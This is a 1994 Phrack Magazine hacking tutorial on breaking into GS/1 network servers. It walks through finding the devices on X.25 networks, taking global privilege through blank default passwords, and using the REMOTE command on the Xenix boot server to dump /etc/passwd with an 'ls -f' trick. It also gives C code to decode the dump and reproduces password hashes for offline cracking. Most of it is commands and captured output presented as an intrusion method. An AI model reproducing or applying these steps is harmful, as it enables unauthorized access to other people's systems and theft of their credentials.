home *** CD-ROM | disk | FTP | other *** search
- ==Phrack Magazine==
-
- Volume Five, Issue Forty-Six, File 17 of 28
-
- ****************************************************************************
-
- [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
- [<> <>]
- [<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>]
- [<> <>]
- [<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
- [<> <>]
- [<> Brought to you by: <>]
- [<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>]
- [<> <>]
- [<> Story line: Maldoror -n- [)r. [)elam <>]
- [<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>]
- [<> Unix Technical Expertise: Wunder-Boy [)elam <>]
- [<> Sysco Technishun: Marvelous Maldoror <>]
- [<> <>]
- [<> Look for other fine [)elamo Labz and ChURcH oF ThE <>]
- [<> Non-CoNForMisT products already on the market such as <>]
- [<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>]
- [<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>]
- [<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>]
- [<> identification program), and various other programs and <>]
- [<> philez written by Dr. Delam, Maldoror, Green Paradox, <>]
- [<> El Penga, Hellpop, and other certified DLI and CNC members. <>]
- [<> <>]
- [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
-
- Index
- ========================================
-
- 1. Finding and identifying a GS/1
- 2. Getting help
- 3. Gaining top privilege access
- 4. Finding the boot server
- 5. Connecting to the boot server
- 6. Getting the boot server password file
- 7. Other avenues
-
-
- ----------------------------------------------------------------------------
-
-
- Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is
- advisable to fill your stein with Sysco and pay close attention... if
- Sysco is not available in your area, Hacker Pschorr beer will work
- almost as good... (especially Oktoberfest variety)
-
-
- What is a GS/1?
- ---------------
- A GS/1 allows a user to connect to various other computers... in other
- words, it's a server, like a DEC or Xyplex.
-
-
- So why hack it?
- ---------------
- Cuz itz there... and plus you kan access all sortz of net stuph fer
- phree. (QSD @ 208057040540 is lame and if you connect to it, you're
- wasting the GS/1.. the French fone police will fly over to your country
- and hunt you down like a wild pack of dogs, then hang you by your own
- twisted pair.)
-
-
- What to do:
- -----------
-
-
-
- +--------------------------------------+
- + #1. Finding and identifying a GS/1 +
- +--------------------------------------+
-
- Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
- GS/1, though the prompt can be set to whatever you want it to be. A
- few years ago there were quite a number of GS/1's laying around on
- Tymnet and Telenet... you can still find a few if you scan the right
- DNIC's. (If you don't know what the hell I'm talking about, look at
- some old Phracks and LOD tech. journals.)
-
- The prompt will look similar to this:
-
- (!2) GS/1>
-
- (The (!2) refers to the port you are on)
-
-
-
- +--------------------+
- + #2. Getting help +
- +--------------------+
-
- First try typing a '?' to display help items.
-
- A help listing looks like this:
-
- > (!2) GS/1>?
- > Connect <address>[,<address>] [ ECM ] [ Q ]
- > DO <macro-name>
- > Echo <string>
- > Listen
- > Pause [<seconds>]
- > PIng <address> [ timeout ]
- > SET <param-name> = <value> ...
- > SHow <argument> ...
-
- At higher privileges such as global (mentioned next) the help will
- look like this (note the difference in the GS/1 prompt with a # sign):
-
- > (!2) GS/1# ?
- > BRoadcast ( <address> ) <string>
- > Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
- > DEFine <macro-name> = ( <text> )
- > DisConnect ( <address> ) [<session number>]
- > DO ( <address> ) <macro-name>
- > Echo <string>
- > Listen ( <address> )
- > Pause [<seconds>]
- > PIng <address> [ timeout ]
- > ReaD ( <address> ) <option> <parameter>
- > REMOTE <address>
- > ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
- > SAve ( <address> ) <option> <filename>
- > SET ( <address> ) <param-name> = <value> ...
- > SETDefault ( <address> ) [<param-name> = <value>] ...
- > SHow ( <address> ) <argument> ...
- > UNDefine ( <address> ) <macro-name>
- > UNSave ( <address> ) <filename>
- > ZeroMacros ( <address> )
- > ZeroStats ( <address> )
-
- Additional commands under global privilege are: BRoadcast, DEFine,
- DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
- ZeroStats, and a few extra options under the normal user commands.
-
- If you need in-depth help for any of the commands, you can again use the
- '?' in the following fashion:
-
- > (!2) GS/1>sho ?
- > SHow ADDRess
- > SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
- > SHow DefaultParameters [<param-name> ...]
- > SHow GLobalPARameters
- > SHow NetMAP [ Short | Long ]
- > SHow PARAmeterS [<param-name> ...]
- > SHow <param-name> ...
- > SHow SESsions [ P ]
- > SHow VERSion
-
- > (!2) GS/1>sh add?
- > SHow ADDRess
-
- > (!2) GS/1>sh add
- > ADDRess = &000023B5%07000201E1D7!2
-
- "sh add" displays your own network, address and port number.
-
- The network is 000023B5
- The address is 07000201E1D7
- The port number is 2
-
-
-
- +------------------------------------+
- + #3. Gaining top privilege access +
- +------------------------------------+
-
- Figure out the global password.
-
- Do a "set priv=global" command.
-
- Note:
- ----
- There are 3 states to set priv to: user, local, and global. Global is
- the state with the most privilege. When you attain global privilege,
- your prompt will change to have a '#' sign at the end of it.. this means
- you have top priceless (similar to *nix's super user prompt).
-
- The GS/1 will prompt you for a password. The default password on GS/1's
- is to have no password at all... The GS/1 will still prompt you for a
- password, but you can enter anything at this point if the password was
- never set.
-
-
-
- +-------------------------------+
- + #4. Finding the boot server +
- +-------------------------------+
-
- Figure out the boot server address available from this GS/1 ..
-
- The boot server is what lies under the GS/1. We've found that GS/1's are
- actually run on a Xenix operating system.. (which is of course a nice
- phamiliar territory) It's debatable whether all GS/1's are run on Xenix or
- not as we have yet to contact the company. (We may put out a 2nd file going
- into more detail.)
-
- Do a "sh b" or "sh global" as shown in the following examples:
-
- > (!2) GS/1# sh b
- > BAud = 9600 BootServerAddress = &00000000%070002017781
- > BReakAction = ( FlushVC, InBand ) BReakChar = Disabled
- > BSDelay = None BUffersize = 82
-
- > (!2) GS/1# sh global
- > ...............................Global Parameters............................
- > DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes
- > DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r"
- > WelcomeString = "Welcome to your haqued server (!2), Connected to "
- > DOmain = "thelabz" Organization = "delam0"
- > PROmpt = "GS/1>" NMPrompt = "GS/1# "
- > LocalPassWord = "" GlobalPassWord = "haque-me"
- > NetMapBroadcast = ON MacType = EtherNET
- > CONNectAudit = ON ERRorAudit = ON
- > AUditServerAddress = &000031A4%07000200A3D4
- > AUditTrailType = Local
- > BootServerAddress = &00000000%070002017781
-
- Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
- ... these are the actual passwords that need to be entered (or in the case
- of the LocalPassWord, "" matches any string). You'll only be able to
- "sh global" after a successful "set priv=global".
-
- Now that you have the boot server address, the next step is enabling
- communication to the boot server.
-
-
-
- +-------------------------------------+
- + #5. Connecting to the boot server +
- +-------------------------------------+
-
- Do a REMOTE <address> where address is the address of the machine you
- want to issue remote commands to.
-
- > (!2) GS/1# REMOTE %070002017781
- > (!2) Remote: ?
- > BInd <address> [-f <bootfile>] [-l <loader>] [<nports>]
- > BRoadcast ( <address> ) "<string>"
- > CoPyfile [<address>:]<pathname> [<address>:][<pathname>]
- > LiSt [ -ls1CR ] [<pathname> ...]
- > MoVe <pathname> <pathname>
- > NAme <clearinghouse name> = <address>[,<address>]...
- > Ping <address> [timeout]
- > ReMove <pathname> ...
- > SET [( <address> )] <param-name> = <value> ...
- > SETDefault <param-name> = <value> ...
- > SHow <argument>
- > UNBind <address>
- > UNDefine <macro name>
- > UNName <name>
- > ZeroStats
- > <BREAK> (to leave remote mode)
-
- Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
- you will be issuing commands to whatever remote machine you specified
- by the REMOTE <address> command.
-
- Notice for this case, the boot server's address was used.
-
- When you get the REMOTE: prompt, you can issue commands that will be
- executed on the remote machine. Try doing a '?' to see if it's another
- GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
-
- Also notice that the help commands on the remote are not the same as
- those for the GS/1 (though, if you establish a remote link with another
- GS/1 they will be the same).
-
- > (!2) Remote: ls -l
- > total 1174
- > drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC
- > drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL
- > drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP
- > drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN
- > drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS
- > drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP
- > drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC
- > drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS
- > -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata
- > -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir
- > -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag
- > drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev
- > drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
- > -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros
- > -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd
-
- Look familiar?? If not, go to the nearest convenient store and buy the
- a 12 pack of the cheapest beer you can find.. leave your computer
- connected so you hurry back, and slam eight or nine cold onez... then
- look at the screen again.
-
- You're basically doing a Remote Procedure Call for ls to your Xenix boot
- server.
-
- Notice at this point that the "passwd" is not owned by root. This is
- because this is not the system password file, and you are not in the
- "/etc" directory... (yet)
-
- There are a couple of problems:
-
- > (!2) Remote: cat
- > Invalid REMOTE command
- >
- > (!2) Remote: cd /etc
- > Invalid REMOTE command
-
- You cannot view files and you cannot change directories.
-
- To solve the "cd" problem do the following:
-
- > (!2) Remote: ls -l ..
- > total 26
- > drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS
- > drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm
- > drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup
- > drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin
- > drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib
- > drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs
- > drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve
- > drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub
- > drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool
- > drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys
- > drwxr-x--- 2 root root 48 Aug 17 1989 sysadm
- > drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp
- >
- > (!2) Remote: ls -l ../..
- > total 1402
- > -rw-r--r-- 1 root root 1605 Aug 17 1989 .login
- > -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs
- > -rw-r--r-- 1 root root 653 Aug 17 1989 .logout
- > -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs
- > -rw------- 1 root root 427 Aug 17 1989 .profile
- > drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin
- > -r-------- 1 bin bin 25526 May 4 1989 boot
- > drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev
- > -r-------- 1 bin bin 577 Nov 3 1987 dos
- > drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc
- > drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib
- > drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
- > drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt
- > drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp
- > drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr
- > -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix
- > -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old
-
- Your brain should now experience deja vous.. you just found the
- root directory. (for the non-*nix, lam0-hacker, the root directory
- has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
-
- Now you can get to /etc/passwd as follows:
-
- > (!2) Remote: ls -l ../../etc
- > total 1954
- > -rwx--x--x 1 bin bin 7110 May 8 1989 accton
- > -rwx------ 1 bin bin 1943 May 8 1989 asktime
- > -rwx------ 1 bin bin 31756 May 8 1989 badtrk
- > -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog
- > -rwx--x--x 1 bin bin 24726 May 8 1989 brand
- > -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist
- > -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last
- > -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs
- > -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig
- > -rwx------ 1 bin bin 2857 May 8 1989 chsh
- > -rwx------ 1 bin bin 7550 May 8 1989 clri
- > -rwx------ 1 bin bin 8034 May 8 1989 cmos
- > -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron
- > -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc
- > ...... etc.
- > -rw-r--r-- 1 root root 465 Mar 5 1991 passwd
-
- Yeah, now what?!
-
- You've found the /etc/passwd file, but you don't have "cat" to type the
- file out. Now you're stuck... so drink a half a bottle of Sysco per
- person. (We did... and as you'll see, Sysco is the drink of a manly hackers
- like us... make sure it's the big bottle kind not those girly small
- onez.)
-
-
-
- +---------------------------------------------+
- + #6. Getting the boot server password file +
- +---------------------------------------------+
-
- There is one way to get around the cat problem (no itz n0t puttin
- catnip laced with somethin U made frum a phile on yer doorstep)
- It's done using ls. On this Xenix system, the directory structure is
- the old Unix format: A 16 byte record comprised of a 2 byte I-number
- and a 14 byte character field.
-
- Note about directory structure for the inquisitive hacker:
- In a directory record there is a 14 byte string containing the file
- name, and the 2 byte I-number (2 bytes = an integer in this case)
- which is a number that is an (I)ndex pointer to the I-node. The
- I-node then contains the information about where the file's data is
- actually kept (similar to how a FAT table works on an IBM PC yet a
- different concept as it has indirect index blocks etc. I won't get
- into) and what permissions are set for the file. Be warned that in
- newer *nix implementations, file names can be more than 14 characters
- and the directory structure will be a bit different than discussed.
-
- The "ls" command has an option that allows you to tell it "this *file* is
- a *directory*.. so show me what's in the directory"... newer *nix
- systems won't like this (the -f option) because of the new directory
- structure.
-
- > (!2) Remote: ls -?
- > ls: illegal option --?
- > usage: -1ACFRabcdfgilmnopqrstux [files]
- >
- > (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
- > 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
- > 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
- > 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
- > 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
- > 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
- > 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
- > 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
- > 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
- > 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
- > 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
- > 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
- > 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL
- > 22327 xcU:100:100:NC 8275 operator:/usr/
- >
- > (!2) Remote: <BRK>
- > (!2) GS/1#
-
- Wow, kewl. Now that you have a bunch-o-shit on your screen, you have
- to make some sense out of it.
-
- The password file is almost legible, but the I-numbers still need to be
- converted to ASCII characters. This can be accomplished in a variety of
- ways... the easiest is to write a program like the following in C:
-
- On a PC the following code should work:
-
- #include <stdio.h>
- main()
- {
- union {
- int i;
- char c[2];
- } x;
- while (1) {
- printf("Enter I-Number: ");
- scanf("%d", &x.i);
- printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
- }
- }
-
- On a *nix based system the following code will work (depending on
- word size and byte arrangement):
-
- #include <stdio.h>
- main()
- {
- union {
- short int i;
- char c[2];
- } x;
- while (1) {
- printf("Enter I-Number: ");
- scanf("%hd", &x.i);
- printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
- }
- }
-
-
- When you have translated the I-numbers you can substitute the ASCII
- values by hand (or write a d0p3 program to do it for you):
-
- 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
- 28530 = [r][o] 30580 = [t][w] 14962 = [r][:]
- root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
-
- 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
- 25697 = [a][d] 14929 = [Q][:] 28265 = [i][n]
- adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
-
- 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
- 29487 = [/][s] 29283 = [c][r] 17210 = [:][C]
- /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
-
- 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
- 28704 = [ ][p] 14895 = [/][:] 13114 = [:][3]
- periodic tasks:/:?bin:NOLOGIN:3:3:System file a
-
- 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
- 28004 = [d][m] 29962 = [^M][u] 25697 = [a][d]
- dministration:/:
- uucp::4:4:Uucp administration:/
-
- 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
- 29557 = [u][s] 27746 = [b][l] 28771 = [c][p]
- usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
-
- 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
- 20300 = [L][O] 25185 = [a][b] 26990 = [n][i]
- LOGIN:6:6:Assignable device administration:/:?sy
-
- 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
- 26995 = [s][i] 12602 = [:][1] 29811 = [s][t]
- sinfo:NOLOGIN:10:10:Access to system information
-
- 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
- 12090 = [:][/] 18759 = [G][I] 25710 = [n][d]
- :/:?network:NOLOGIN:12:12:Mail and Network admin
-
- 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
- 29545 = [i][s] 28528 = [p][o] 20302 = [N][O]
- istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
-
- 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
- 29806 = [n][t] 29545 = [i][s] 28528 = [p][o]
- nt spooler administration:/usr/spool/lp:?dos:NOL
-
- 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL
- 18255 = [O][G] 8307 = [s][ ] 12090 = [:][/]
- OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
-
- 22327 xcU:100:100:NC 8275 operator:/usr/
- 22327 = [7][W] 8275 = [S][ ]
- 7WxcU:100:100:NCS operator:/usr
-
-
- The resulting file will look like the following:
-
- root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
- adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
- /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
- periodic tasks:/:?bin:NOLOGIN:3:3:System file a
- dministration:/:
- uucp::4:4:Uucp administration:/
- usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
- LOGIN:6:6:Assignable device administration:/:?sy
- sinfo:NOLOGIN:10:10:Access to system information
- :/:?network:NOLOGIN:12:12:Mail and Network admin
- istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
- nt spooler administration:/usr/spool/lp:?dos:NOL
- OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
- 7WxcU:100:100:NCS operator:/usr
-
- Because the ls command cannot display "non-printable" characters such
- as the carriage return, it will replace them with a '?' character...
- delete the '?' characters and divide by line at these locations. When
- you finish doing that, you'll have a standard /etc/passwd file:
-
- root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
- sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
- cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
- bin:NOLOGIN:3:3:System file administration:/:
- uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
- asg:NOLOGIN:6:6:Assignable device administration:/:
- sysinfo:NOLOGIN:10:10:Access to system information:/:
- network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
- lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
- dos:NOLOGIN:16:10:Access to Dos devices:/:
- ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr
-
- Once you've assembled your password file in a standard ASCII form,
- you'll of course want to crack it with one of the many available DES
- cracking programs.
-
- +---------------------+
- + #7: Other Avenues +
- +---------------------+
-
- Find out what else you can play with by first finding what networks are
- available other than your own, and second, find out what machines are on
- your network:
-
- >(!2) GS/1# sh att
- > Attached Networks
- >&000023B5
- >(!2) GS/1# sh nmap l
- > NETWORK &000023B5 MAP
- >
- > 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1
- > 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020
- > 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1
- > 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2
- > .... etc.
-
- The boot server address, from previous examples, is number 1
- which contains a description "SW/AT-NCS". Examining the rest of the
- list, number 6 has the same description. System 12 may be just another
- address for the boot server or it may be a different Xenix... but it should
- be Xenix whatever it is.
-
- We have refrained from covering the typical GS/1 information that has been
- published by others; and instead, covered newer concepts in GS/1 hacking.
- This phile is not a complete guide to GS/1 hacking; but expect successive
- publications on the topic.
-
-
-
-
-
-
-